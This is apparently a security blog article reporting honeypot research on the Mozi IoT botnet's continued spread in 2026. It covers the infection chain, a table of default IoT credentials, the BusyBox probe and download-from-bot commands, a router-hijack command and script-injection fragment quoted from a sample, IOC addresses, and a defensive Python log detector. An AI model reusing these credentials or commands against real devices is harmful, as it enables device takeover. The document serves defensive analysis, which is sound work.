Mozi Botnet: IoT Malware Analysis & Threat Intelligence
This article is based on original honeypot research published in our ebook. The full book includes extended analysis, additional IOCs, detection rules, and remediation procedures not covered here.
Read on Kindle →
As a web agency managing dozens of servers for our clients, we actively monitor security threats. This research comes from our honeypot dedicated to IoT threat intelligence. The article is written in English to reach the international community of security researchers.
The Mozi botnet was one of the most aggressive IoT botnets ever documented, responsible for up to 90% of all IoT malware traffic at its peak. After Chinese law enforcement arrested its operators in 2021 and distributed a kill switch in August 2023, every major security vendor declared it dead.
They were wrong.
Our independent honeypot research shows that while the Mozi command-and-control network is indeed gone, the trojan.linux.mozi botnet continues to replicate autonomously across the internet. In a single 24-hour observation window on March 30, 2026, we captured 538,518 attack sessions and downloaded 5 unique Mozi samples from 15 active propagation nodes across China, Pakistan, Russia, Indonesia, Albania, Australia, and Argentina.
This article presents our complete botnet malware analysis, including the infection chain, live indicators of compromise, and what this means for IoT security in 2026.
What Is the Mozi Botnet?
The Mozi botnet is a peer-to-peer (P2P) IoT botnet first discovered in 2019 by 360 Netlab. It targets Linux-based IoT devices — home routers, IP cameras, DVRs, and network storage — by brute-forcing default credentials over Telnet and SSH.
What made Mozi unique among IoT botnets was its use of a Distributed Hash Table (DHT) for command-and-control communication, borrowed from the BitTorrent protocol. This made it extremely resilient: there was no central server to take down.
At peak activity:
- 1.5+ million infected devices worldwide
- 90% of all IoT botnet traffic (IBM X-Force, 2020)
- Primary targets: MIPS and ARM-based devices in China, India, Pakistan
- Capabilities: DDoS attacks, data exfiltration, web injection, router exploitation
The trojan.linux.mozi botnet was built from code borrowed from three earlier botnets: Mirai, Gafgyt, and IoT Reaper.
The 2023 Kill Switch: What Happened
In September 2021, Chinese law enforcement arrested the Mozi operators. In August 2023, a kill switch was distributed through Mozi's own DHT network (documented by ESET Research). The payload instructed bots to:
- Stop all scanning and propagation
- Disable the embedded HTTP server
- Replace the running binary
- Persist the shutdown via cron
This was widely reported as the end of Mozi. Security vendors removed it from active threat lists. FortiGuard, Sophos, and others stopped flagging trojan.linux.mozi botnet detections as critical.
The problem: the kill switch only reached bots that were online and participating in the DHT at the time. Devices that were temporarily offline, behind restrictive NAT, or running on read-only filesystems never received it. And when those devices came back online, they continued scanning — reinfecting neighbors who had been cleaned.
Our Research Setup: Honeypot Infrastructure
We deployed a multi-service honeypot on a Hetzner Cloud VPS in Helsinki, Finland:
| Service | Port | Purpose |
|---|---|---|
| Cowrie SSH | 22 | Capture brute-force attacks and malware downloads |
| Cowrie Telnet | 23 | Same for Telnet-based IoT attacks |
| Endlessh tarpit | 3389 | Slow down automated scanners |
| Custom DHT Crawler | 6881/UDP | Monitor the Mozi P2P network |
The DHT crawler is a custom Python tool (1,100 lines) that participates in the BitTorrent DHT network, queries all known Mozi info_hashes, and classifies discovered peers through active probing.
All data was collected passively through our own infrastructure. No unauthorized access was attempted.
Key Finding: The Mozi DHT Command Network Is Dead
After crawling 1.46 million DHT nodes and sending over 2.25 million messages, we can confirm: the Mozi DHT C2 network is conclusively dead.
| Metric | Value |
|---|---|
| DHT nodes crawled | 1,458,496 |
| Messages sent/received | 2,255,758 / 1,140,266 |
| Mozi bots detected via DHT | 0 |
| C2 commands intercepted | 0 |
| Mozi announce_peer messages | 0 |
The 63 peers returned for Mozi-associated info_hashes were all either:
- Research sinkholes (25 IPs) — VPS hosting providers running passive listeners
- Offline ghosts (25 IPs) — former peers, now unreachable
- Legitimate BitTorrent clients (3 IPs) — false positives from DHT routing
We identified two large sinkhole clusters operated from Russian infrastructure (Teleport Media in Perm, Start2 LLC in Moscow) — researchers monitoring the dead network, just like us.
The kill switch succeeded in destroying Mozi's C2 layer. But that's only half the story.
Key Finding: The Worm Is Still Actively Spreading
Despite zero C2 activity, our Cowrie honeypot recorded massive scanning activity in just 24 hours:
| Metric | 24-Hour Count |
|---|---|
| Total attack sessions | 538,518 |
| Telnet sessions (port 23) | 524,945 |
| SSH sessions (port 22) | 13,936 |
| Successful logins | 11,031 |
| Commands executed | 118,594 |
| Malware download attempts | 33,573 |
| Unique source IPs downloading /i | 38 |
The /i download path is the universal Mozi fingerprint — every Mozi variant since 2019 serves its binary at http://<bot_ip>:<random_high_port>/i.
We verified this by directly connecting to the top 20 download URLs and confirmed that 15 out of 20 are actively serving Mozi ELF binaries right now.
This is one of the most significant recent botnet attacks still active in 2026 — and most of the security industry has stopped watching.
The Mozi Infection Chain in 2026
The attack pattern we observe is identical to the classic Mozi replication chain from 2019-2023. It operates in 5 stages:
Stage 1: Credential Brute-Force
The bot tries default IoT credentials over Telnet (primarily) and SSH. The top 10 credential pairs hitting our honeypot:
| Credentials | Count/24h | Target Devices |
|---|---|---|
| root:(empty password) | 8,904 | Generic Linux |
| admin:1234 | 6,452 | ZTE/Huawei routers |
| root:root | 6,381 | Generic |
| root:hi3518 | 6,027 | HiSilicon IP cameras |
| admin:admin | 4,806 | Various routers |
| root:Zte521 | 4,415 | ZTE routers |
| root:xc3511 | 4,415 | Xiongmai DVR/NVR |
| root:xmhdipc | 4,287 | Xiongmai IP cameras |
| admin:cat1029 | 4,425 | Catapult/Mirai target |
| super:sp-admin | 4,290 | Supermicro IPMI |
These are the same credentials Mozi has used since 2019. No new credentials have been added, confirming that the worm is not being updated.
Stage 2: Shell Escape
After login, the bot executes a hardcoded sequence to escape restricted router CLIs:
start → enable → config terminal → system → linuxshell → su → shell → sh
This covers Cisco IOS, Huawei VRP, and generic BusyBox shells. The sequence was executed 11,985 times in our 24-hour window, identically across all attacking IPs.
Stage 3: Architecture Fingerprinting
The bot determines the target CPU architecture using a clever BusyBox trick:
/bin/busybox wget;/bin/busybox echo -ne '\x46\x5a\x5a\x49\x48\x4b'
The echo -ne command writes those bytes to the terminal. If the output matches what BusyBox produces on a specific architecture (MIPS LE, MIPS BE, ARM, etc.), the bot selects the matching binary.
Stage 4: Payload Download
wget http://<bot_own_ip>:<high_port>/i
Each infected device serves its own copy of the malware via an embedded nginx HTTP server on a random high port. There is no central download server — this is pure peer-to-peer propagation.
Stage 5: Execution
The binary is executed, and the new bot immediately begins scanning for more victims. The cycle completes in seconds.
Botnet Malware Analysis: 5 Live Mozi Samples
We captured 5 unique samples from 15 active bots:
| SHA256 | Architecture | Size | Active Bots |
|---|---|---|---|
| f6c97b1e2ed02578ca1066c8235ba4f991e645f89012406c639dbccc6582eec8 | MIPS-32 LE | 137 KB | 5 |
| 4293c1d8574dc87c58360d6bac3daa182f64f7785c9d41da5e0741d2b1817fc7 | MIPS-32 BE | 136 KB | 6 |
| 2e4506802aedea2e6d53910dfb296323be6620ac08c4b799a879eace5923a7b6 | MIPS-32 BE | 133 KB | 1 |
| b5cf68c7cb5bb2d21d60bf6654926f61566d95bfd7c9f9e182d032f1da5b4605 | MIPS-32 BE | 135 KB | 1 |
| 12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef | ARM-32 LE | 308 KB | 2 |
All MIPS samples are UPX-packed. The ARM sample is stripped but unpacked, providing full visibility.
ARM Sample Deep Dive
The 308 KB ARM sample (12013662...) contains the complete Mozi toolkit:
C2 Configuration Tags (unused but present):
- [cnc]: command and control
- [atk]: attack module
- [ss]: scanner configuration
The C2 parsing code is fully intact. If someone were to revive the DHT network and distribute signed commands, these bots would obey.
Embedded Router Exploits:
cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer
URL "http://127.0.0.1"
ConnectionRequestPassword "acsMozi"
This hijacks Huawei home gateways by redirecting their TR-069 management server to localhost, locking out the ISP.
Web Injection Capability:
document.write('<script language="javascript" src="http://...
The bot can inject JavaScript into HTTP traffic passing through infected routers — potentially redirecting users or stealing credentials.
DHT Bootstrap Nodes (historical, no longer active): dht.transmissionbt.com:6881, 130.239.18.159:6881, 212.129.33.59:6881
Hardcoded DNS: 8.8.8.8 (Google), 114.114.114.114 (China 114DNS)
Active Propagation Nodes (Indicators of Compromise)
These IPs were confirmed serving Mozi binaries on March 30, 2026:
| IP Address | Country | Port | Architecture |
|---|---|---|---|
| 46.146.238.1 | Russia | 39657 | MIPS LE |
| 110.37.53.25 | Pakistan | 56836 | MIPS BE |
| 77.247.93.40 | Albania | 36940 | ARM LE |
| 103.164.128.50 | Australia | 33037 | MIPS BE |
| 112.237.192.167 | China | 38972 | MIPS BE |
| 42.58.167.27 | China | 42912 | MIPS LE |
| 175.149.113.54 | China | 54382 | MIPS LE |
| 42.87.139.108 | China | 34258 | MIPS LE |
| 42.230.42.4 | China | 37422 | MIPS BE |
| 222.137.73.213 | China | 59696 | MIPS BE |
| 1.43.5.24 | Australia | 40236 | MIPS BE |
| 110.138.135.27 | Indonesia | 45248 | ARM LE |
| 221.15.142.132 | China | 47339 | MIPS BE |
| 200.59.83.48 | Argentina | 40804 | MIPS LE |
| 42.236.223.242 | China | 48800 | MIPS BE |
Note: These are infected victim devices (home routers, cameras), not malicious infrastructure. The owners are likely unaware.
Network Signatures:
- HTTP response headers: Server: nginx, Content-Type: application/zip
- Download path: /i
- Random high port (>10000, changes per device)
How to Detect Trojan.Linux.Mozi Botnet Traffic
If you manage a network and want to check for trojan.linux.mozi botnet activity:
On Your Firewall/IDS
- Outbound Telnet/SSH connections from IoT devices to random IPs (scanning)
- HTTP GET requests to random high ports with path /i
- BusyBox command patterns: /bin/busybox wget followed by /bin/busybox echo -ne
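As an added example (not the authors' tooling), a small Python detector that applies these indicators to Cowrie JSON logs: it groups events by session and flags the CLI escape sequence, the BusyBox architecture probe, and downloads of /i from a high port. The sample log lines and the 192.0.2.x addresses are constructed for the demonstration.

```python
import json
import re
from urllib.parse import urlparse
# Cowrie writes one JSON object per line; eventid names and the "input"/"url" fields
# are Cowrie's own. Indicators follow the article: the CLI escape sequence, the
# BusyBox architecture probe, and a download of path /i from a random high port.
ESCAPE_SEQUENCE = ["start", "enable", "config terminal", "system",
                   "linuxshell", "su", "shell", "sh"]
BUSYBOX_PROBE = re.compile(r"/bin/busybox wget;\s*/bin/busybox echo -ne")

def is_mozi_download_url(url):
    """Mozi fingerprint: plain HTTP, path exactly /i, port above 10000."""
    p = urlparse(url)
    return p.scheme == "http" and p.path == "/i" and (p.port or 0) > 10000

def classify_session(events):
    """Return the set of Mozi indicators present in one session's events."""
    found = set()
    commands = [e.get("input", "") for e in events
                if e.get("eventid") == "cowrie.command.input"]
    if all(step in commands for step in ESCAPE_SEQUENCE):
        found.add("cli_escape_sequence")
    if any(BUSYBOX_PROBE.search(c) for c in commands):
        found.add("busybox_arch_probe")
    for e in events:
        if (e.get("eventid") == "cowrie.session.file_download"
                and is_mozi_download_url(e.get("url", ""))):
            found.add("mozi_download")
    return found

def scan_log(lines):
    """Group log lines by Cowrie session id; return only sessions with indicators."""
    sessions = {}
    for line in lines:
        if line.strip():
            event = json.loads(line)
            sessions.setdefault(event["session"], []).append(event)
    return {sid: f for sid, evs in sessions.items() if (f := classify_session(evs))}

def _event(session, eventid, **fields):
    return json.dumps({"session": session, "eventid": eventid, **fields})
# Constructed sample log (not captured data); 192.0.2.x addresses are placeholders.
SAMPLE_LOG = [_event("s1", "cowrie.command.input", input=c) for c in ESCAPE_SEQUENCE] + [
    _event("s1", "cowrie.command.input",
           input="/bin/busybox wget;/bin/busybox echo -ne '\\x46\\x5a\\x5a\\x49\\x48\\x4b'"),
    _event("s1", "cowrie.session.file_download", url="http://192.0.2.10:39657/i"),
    _event("s2", "cowrie.command.input", input="uname -a"),
    _event("s2", "cowrie.session.file_download", url="http://192.0.2.20:80/update.sh"),
]
```

Feed it the lines of Cowrie's cowrie.json to get a mapping of session id to the indicators seen; session s2 in the sample produces no hit because a download from port 80 with a different path does not match the fingerprint.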
On Suspected Devices
# Check for a running Mozi process
ps | grep -i mozi
# Look for Mozi's hidden working files
ls -la /var/run/.x /tmp/.x /dev/.x /dev/shm/.x 2>/dev/null
# Check whether DNS was replaced with the hardcoded resolvers (8.8.8.8, 114.114.114.114)
cat /etc/resolv.conf
# Check for persistence entries
crontab -l
Removal
Mozi does not survive a reboot on most devices. Simply power-cycling the infected device will remove the active infection. However, if the device still has default credentials, it will be reinfected within minutes.
The real fix: change default passwords and disable remote Telnet/SSH access on all IoT devices.
Why IoT Botnets Like Mozi Won't Die
Mozi is a case study in the headless worm problem. When a botnet's replication logic is fully autonomous — requiring no C2 server to spread — decapitating the command infrastructure does not stop propagation.
Mozi will continue spreading until:
- All vulnerable devices are patched (unlikely — many are abandoned hardware)
- All infected devices are rebooted simultaneously (impossible at scale)
- ISPs block scanning traffic at the network level (partially happening in some countries)
- Manufacturers ship devices with unique passwords (slowly improving, but millions of legacy devices remain)
The same default credentials that enabled Mozi in 2019 (root:xmhdipc, admin:1234, root:Zte521) still work on devices being deployed in 2026.
Until the IoT industry solves the default credential problem, headless botnets will haunt the internet indefinitely.
Full Technical Report
This article is a summary of our complete research. The full technical report — including DHT crawler methodology, sinkhole infrastructure analysis, the Go-based SSH worm we also captured, and extended sample analysis — is available as an eBook:
Mozi Is Dead, Long Live Mozi — Full Report on Amazon Kindle
For sample requests, collaboration, or consulting inquiries, connect via LinkedIn or contact us.
Frequently Asked Questions
What is the Mozi botnet?
The Mozi botnet is a peer-to-peer IoT botnet discovered in 2019 that infects Linux-based devices (routers, cameras, DVRs) by brute-forcing default credentials. It used a BitTorrent DHT network for command-and-control. At its peak, it was responsible for 90% of all IoT botnet traffic worldwide.
Is the Mozi botnet still active in 2026?
Yes and no. The command-and-control DHT network is dead (killed by a law enforcement kill switch in August 2023). However, the worm's autonomous replication continues: we confirmed 15 active propagation nodes serving Mozi malware across 7 countries on March 30, 2026.
How do I know if I'm infected with trojan.linux.mozi?
Check for: unusual outbound Telnet/SSH connections from your IoT devices, files named .x in /tmp/, /var/run/, or /dev/shm/, and an HTTP server running on a random high port. Most consumer antivirus won't detect it because it only infects embedded Linux devices, not PCs.
How do I remove the Mozi botnet from my device?
Reboot the device — Mozi doesn't survive a restart on most hardware. Then immediately change the default password and disable remote Telnet access. If you don't change the password, the device will be reinfected within minutes.
What devices does Mozi target?
Mozi primarily targets MIPS and ARM-based Linux devices: home routers (ZTE, Huawei, Netgear), IP cameras (HiSilicon, Xiongmai), DVRs/NVRs, and network-attached storage. Any device with default Telnet/SSH credentials is at risk.
What are recent botnet attacks in 2026?
As of March 2026, Mozi remains one of the most active IoT botnets by volume, despite having no active C2. Other active threats include Mirai variants, the Androxgh0st botnet targeting web applications, and a new Go-based SSH worm/cryptominer captured in our honeypot research.